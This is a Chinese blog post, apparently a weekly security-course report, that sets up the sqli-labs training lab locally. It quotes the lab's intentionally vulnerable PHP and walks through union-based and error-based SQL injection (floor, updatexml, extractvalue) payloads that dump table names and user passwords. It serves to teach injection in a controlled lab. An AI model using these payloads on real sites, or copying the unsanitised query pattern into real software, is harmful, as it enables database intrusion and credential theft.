<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.cat.net/css?family=PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）1、编写常规回显注入的代码，在之前的搭建的环境中测试是否正常 2、编写报错注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常 3、编写盲注的代码，在之前的搭建的环境中测试是否正常 4、编写宽子节注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常">
<meta property="og:type" content="article">
<meta property="og:title" content="第十周：注入代码编写与环境搭建">
<meta property="og:url" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content="任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）1、编写常规回显注入的代码，在之前的搭建的环境中测试是否正常 2、编写报错注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常 3、编写盲注的代码，在之前的搭建的环境中测试是否正常 4、编写宽子节注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229215926381.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229222229949.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229222402070.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229223502624.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230123709069.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230124842363.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230130823332.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230132303361.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230133417735.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230192541404.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230195529653.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230200946330.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230203349876.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230204513171.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230204803589.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230211945252.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230212319296.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230215511126.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231103645169.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231103850645.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231133446179.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231134015958.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231173039055.png">
<meta property="og:updated_time" content="2021-01-12T07:40:11.730Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="第十周：注入代码编写与环境搭建">
<meta name="twitter:description" content="任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）1、编写常规回显注入的代码，在之前的搭建的环境中测试是否正常 2、编写报错注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常 3、编写盲注的代码，在之前的搭建的环境中测试是否正常 4、编写宽子节注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常">
<meta name="twitter:image" content="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229215926381.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/">





  <title>第十周：注入代码编写与环境搭建 | Bu1'Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bu1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Bu1">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">第十周：注入代码编写与环境搭建</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-06T09:34:47+08:00">
                2021-01-06
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/信安之路/" itemprop="url" rel="index">
                    <span itemprop="name">信安之路</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/01/06/第十周：注入代码编写与环境搭建/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2021/01/06/第十周：注入代码编写与环境搭建/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  4.3k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  17 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）"><a href="#任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）" class="headerlink" title="任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）"></a>任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）</h1><p>1、编写常规回显注入的代码，在之前的搭建的环境中测试是否正常</p>
<p>2、编写报错注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常</p>
<p>3、编写盲注的代码，在之前的搭建的环境中测试是否正常</p>
<p>4、编写宽子节注入的代码，并做相应的服务器配置来满足条件，并测试代码是否正常</p>
<a id="more"></a>

<p>注意事项：环境可以是虚拟机的快照、也可以是 docker 环境，具体用什么可以自选，重点是学习造成这几类注入的原因；注入漏洞通常会出现在多个场景，比如：注册、登录、查询、搜索、留言等，所以写那些脚本的时候可以自选场景，不限于举例的场景；有些注入环境与服务器配置相关，需要大家配置相应的漏洞环境来结合自己编写的脚本完成漏洞环境的搭建。</p>
<p>如何编写漏洞脚本呢？有些同学一点编程基础都没有，想要自己实现漏洞代码非常艰难，怎么办呢？</p>
<h4 id="第一级：完全不懂，没有一点开发经验的"><a href="#第一级：完全不懂，没有一点开发经验的" class="headerlink" title="第一级：完全不懂，没有一点开发经验的"></a>第一级：完全不懂，没有一点开发经验的</h4><p>对于这部分同学，直接去写漏洞代码有点强人所难，如何跟上节奏完成任务呢？自己可以去收集一些 关于 sql 注入的 CTF 题目，将那些题目搭建起来，不用写代码、也不用看代码，通过自己的搜索能力完成本周的任务也是可以的，具体代码想要看懂需要时间，这个可以后续自己节省时间来学习编程基础。</p>
<h4 id="第二级：懂点-PHP-编程语法，能看懂-php-代码的"><a href="#第二级：懂点-PHP-编程语法，能看懂-php-代码的" class="headerlink" title="第二级：懂点 PHP 编程语法，能看懂 php 代码的"></a>第二级：懂点 PHP 编程语法，能看懂 php 代码的</h4><p>这部分同学就不要光搭建了，html、js 等前端基础没有的情况下，编写页面也比较费劲，那么你也可以去像第一级同学一样的方式去获取一些题目，然后自己是看得懂代码的，所以可以基于那些 ctf 已有前端，然后更改后端代码，从而实现本周任务，就是借用别人的前端，完成自己的目标。</p>
<h4 id="第三级：会写-php-并且懂一些前端-js、html-等基础"><a href="#第三级：会写-php-并且懂一些前端-js、html-等基础" class="headerlink" title="第三级：会写 php 并且懂一些前端 js、html 等基础"></a>第三级：会写 php 并且懂一些前端 js、html 等基础</h4><p>这部分同学就比较高级了，完全可以自己实现相关代码，前端后端，各种场景，应该得心应手了，所以要给大家做表率，可以挑一些少见的场景来设计实现，作为大家的领路人。</p>
<h4 id="其他情况"><a href="#其他情况" class="headerlink" title="其他情况"></a>其他情况</h4><p>大家对于编程语言有不同的基础，大家可以选择自己擅长的语言来实现，具体情况自己来定。</p>
<h1 id="学习报告"><a href="#学习报告" class="headerlink" title="学习报告"></a>学习报告</h1><h2 id="0x00-环境搭建"><a href="#0x00-环境搭建" class="headerlink" title="0x00 环境搭建"></a>0x00 环境搭建</h2><p>在语言方面比较弱，如果重新学习语言耗费的时间精力会比较多，因此这次采用的是开源靶场<em>sqli-labs</em>来进行实验，首先简单说一下环境的搭建过程。</p>
<ol>
<li><p>下载安装phpstudy2016版本</p>
<blockquote>
<p><a href="https://www.xp.cn/wenda/407.html" target="_blank" rel="noopener">https://www.xp.cn/wenda/407.html</a></p>
</blockquote>
</li>
<li><p>下载<em>sqli-labs</em></p>
<blockquote>
<p><a href="https://github.com/Audi-1/sqli-labs" target="_blank" rel="noopener">https://github.com/Audi-1/sqli-labs</a></p>
</blockquote>
</li>
<li><p>将下载好的<em>sqli-labs</em>解压到phpstudy的www文件夹中</p>
</li>
<li><p>修改<em>sqli-labs</em>目录中sqli-labs\sql-connections\db-creds.inc文件</p>
<blockquote>
<p>$dbuser =’root’; </p>
<p>$dbpass =’root’; </p>
<p>$dbname =”security”; </p>
<p>$host = ‘localhost’;</p>
<p>$dbname1 = “challenges”;</p>
</blockquote>
</li>
<li><p>启动phpstudy，浏览器打开<code>http://127.0.0.1/sqli-labs/</code>进入首页后点击第一个创建数据库，创建完成后返回首页下滑即可看到关卡。</p>
</li>
</ol>
<h2 id="0x01-常规回显的注入代码"><a href="#0x01-常规回显的注入代码" class="headerlink" title="0x01 常规回显的注入代码"></a>0x01 常规回显的注入代码</h2><p>首先进入第一关，接了一个<code>&#39;</code>，页面有回显。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229215926381.png" alt="image-20201229215926381"></p>
<p>看下源代码，找一下漏洞点。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];  <span class="comment">//1.接收获得的id值</span></span><br><span class="line">$fp=fopen(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line">fwrite($fp,<span class="string">'ID:'</span>.$id.<span class="string">"\n"</span>);</span><br><span class="line">fclose($fp);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;  <span class="comment">//2.从这里可以看到未对传进来的ID值进入处理</span></span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;font size='5' color= '#99FF00'&gt;"</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'Your Login name:'</span>. $row[<span class="string">'username'</span>];</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'Your Password:'</span> .$row[<span class="string">'password'</span>];</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> </span><br><span class="line">	&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#FFFF00"&gt;'</span>;</span><br><span class="line">	print_r(mysql_error());</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;  </span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123; <span class="keyword">echo</span> <span class="string">"Please input the ID as parameter with numeric value"</span>;&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>个人喜欢联合注入，用联合注入来做一下这道题。</p>
<ol>
<li><p>用order by来判断一下列数数<code>?id=1&#39; order by 4 --+</code>，<strong>注意</strong> +在url中表示为空格，–为mysql的注释符。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229222229949.png" alt="image-20201229222229949"></p>
</li>
<li><p>报错。说明不存在4列，一般可使用<strong>二分法</strong>快速定位，这里的列数少就不用了，直接用<code>?id=1&#39; order by 3 --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229222402070.png" alt="image-20201229222402070"></p>
</li>
<li><p>正常显示，说明一共有3列。显示位判断<code>?id=-1&#39; union select 1,2,3 --+</code>，<strong>显示位判断的意思是网页中能够显示信息的位置，我们只可以通过这个位置获取到想要的信息</strong>，1、2、3可以理解为占位符，上面说了一个有三列，我们用1、2、3占满位置，通过回显信息就可以知道哪个位置可以接收到返回信息。这里的<code>id=-1</code>是为了构造一条查询结果为空的语句，这样在进行union联合查询时只会显示后一条语句的返回结果。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201229223502624.png" alt="image-20201229223502624"></p>
</li>
<li><p>看一下当前的数据库名<code>?id=-1&#39; UNION SELECT 1,2,DATABASE() --+</code>，执行DATABASE()函数借用3号位置进行回显，通过回显信息我易知当前数据库名为security。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230123709069.png" alt="image-20201230123709069"></p>
</li>
<li><p>查询当前数据库下的表名<code>?id=-1&#39; union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;) --+</code>。通过回显数据知道了一共存在四个表。在不知道数据库名的情况下可以用database()代替省略第4步<code>?id=-1&#39; union select 1,2,(select group_concat(table_name) frominformation_schema.tables where table_schema=database()) --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230124842363.png" alt="image-20201230124842363"></p>
</li>
</ol>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&gt; MySQL的行转列、列转行、连接字符串  concat、concat_ws、group_concat函数用法</span><br><span class="line">&gt;  CONCAT(str1,str2,…)  </span><br><span class="line">&gt;  CONCAT_WS(separator,str1,str2,...)</span><br><span class="line">&gt;  group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段]  	  [Separator&apos;分隔符&apos;])</span><br><span class="line">&gt;</span><br></pre></td></tr></table></figure>
</blockquote>
<ol start="6">
<li><p>查询user表下的字段名<code>select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;</code> </p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230130823332.png" alt="image-20201230130823332"></p>
</li>
<li><p>查询字段对应的数据<code>?id=-1&#39; union select 1,2,(select group_concat(id,username,password SEPARATOR &#39;&lt;br&gt;&#39;) from users) --+</code>  在进行换行时也可以将<code>&lt;br&gt;</code>写成<code>0x3c62723e</code>进行换行。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230132303361.png" alt="image-20201230132303361"></p>
<p>也可以用CONCAT_WS(separator,str1,str2,…)函数对ID、username、password进行分割<code>?id=-1&#39; union select 1,2,(select group_concat(concat_ws(&#39;**&#39;,id,username,password)) from users) --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230133417735.png" alt="image-20201230133417735"></p>
<p>还可以用<code>select group_concat(concat(username, 0x7e, password)) from users</code>对两个字段进行分割。</p>
</li>
</ol>
<h2 id="0x02-报错注入的代码"><a href="#0x02-报错注入的代码" class="headerlink" title="0x02 报错注入的代码"></a>0x02 报错注入的代码</h2><p>注入的本质都是sql语句的执行，报错注入的回显来自错误中、时间盲注在回显在时间判断中、DNSlog盲注中回显在DNSlog中。</p>
<p>第一部分的代码中同样可以用报错注入，但是多见识几种代码的写法总是好的，所以来看看靶场的第5关，用我们用的playload测试一下<code>?id=1&#39; order by 3 --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230192541404.png" alt="image-20201230192541404"></p>
<p>通过多次测试可以知道了语句执行正确时会打印出”You are in…..”，不会有语句的回显。看一下源代码。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">'id'</span>]))</span><br><span class="line">&#123;</span><br><span class="line">$id=$_GET[<span class="string">'id'</span>];</span><br><span class="line"></span><br><span class="line">$fp=fopen(<span class="string">'result.txt'</span>,<span class="string">'a'</span>);</span><br><span class="line">fwrite($fp,<span class="string">'ID:'</span>.$id.<span class="string">"\n"</span>);</span><br><span class="line">fclose($fp);</span><br><span class="line"></span><br><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;	</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;     <span class="comment">// 1.可以看到语句执行后没有回显</span></span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font size="3" color="#FFFF00"&gt;'</span>;</span><br><span class="line">	print_r(mysql_error());   <span class="comment">//2.打印出语句执行的错误信息</span></span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;&lt;/font&gt;"</span>;	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size= 3&gt;'</span>;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ol>
<li><p>通过代码知道了会有语句执行错误的信息打印出来，因此我们可以精心构造playload利用报错来显示我们需要的一些敏感数据。</p>
</li>
<li><p>通过报错来获取数据库名。常用的有通过floor报错、通过updatexml报错、通过ExtractValue报错</p>
<ul>
<li><p>通过floor报错来获取数据库名，其中payload为我们自己构造的代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</span><br><span class="line"></span><br><span class="line">原理简析：sql语句规定在查询结果的基础上再执行查询时，需要给之前的结果一个别名。因此x代表(rand(0)*2))结果，而a代表着前面整个select语句的执行结果。根据mysql的特性，floor(),group by()冲突报错一起使用时会产生冲突。</span><br></pre></td></tr></table></figure>

<blockquote>
<p> <code>?id=1&#39; and (select 1 from (select count(*),concat((DATABASE()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+</code></p>
<p> <strong>该语句的输出字符长度限制为64个字符</strong></p>
</blockquote>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230195529653.png" alt="image-20201230195529653"></p>
</li>
<li><p>通过updatexml报错来获取数据库名，其中payload为我们自己构造的代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and updatexml(1,concat(0x7e,(playload),0x7e),3) --+</span><br><span class="line"></span><br><span class="line">UPDATEXML (XML_document, XPath_string, new_value);</span><br><span class="line">第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc </span><br><span class="line">第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 </span><br><span class="line">第三个参数：new_value，String格式，替换查找到的符合条件的数据 </span><br><span class="line">作用：改变文档中符合条件的节点的值</span><br><span class="line"></span><br><span class="line">原理简析：0x7e为~的ASSIC编码，而updatexml的第二个参数需要Xpath格式的字符串，但是通过coucat()函数构造了一个~payload~的字符串，明显不符合xml的语法格式</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>?id=1&#39; and updatexml(1,concat(0x7e,(DATABASE()),0x7e),3) --+</code></p>
<p><strong>只有在payload返回的结果不是xml格式时才会生效，该语句的输出字符长度限制为64个字符</strong></p>
</blockquote>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230200946330.png" alt="image-20201230200946330"></p>
</li>
<li><p>通过ExtractValue报错来获取数据库名，其中payload为我们自己构造的代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos; and extractvalue(1,concat(0x7e,(playload),0x7e)) --+</span><br><span class="line"></span><br><span class="line">EXTRACTVALUE (XML_document, XPath_string);</span><br><span class="line">第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</span><br><span class="line">第二个参数：XPath_string (Xpath格式的字符串)</span><br><span class="line">作用:对XML文档进行查询的函数</span><br><span class="line"></span><br><span class="line">原理简析：与updatexml()函数原理差不多，第二个参数都要求为xpath格式字符串，构造了一个不符合xml格式的字符串~playload~。</span><br></pre></td></tr></table></figure>

<blockquote>
<p><code>?id=1&#39; and extractvalue(1,concat(0x7e,(DATABASE()),0x7e)) --+</code></p>
<p><strong>该语句的输出字符长度限制为32个字符</strong></p>
</blockquote>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230203349876.png" alt="image-20201230203349876"></p>
</li>
</ul>
</li>
<li><p>现在我们知道了数据库的名字为security，接下来就是常规的sql注入流程，本次利用ExtractValue报错来来完成接下来的操作。按照流程爆一下数据库的表<code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;),0x7e)) --+</code>,这里的playload与关卡一用到的相同。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230204513171.png" alt="image-20201230204513171"></p>
</li>
<li><p>现在可以查询下users表下的字段名<code>?id=1&#39; and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;),0x7e)) --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230204803589.png" alt="image-20201230204803589"></p>
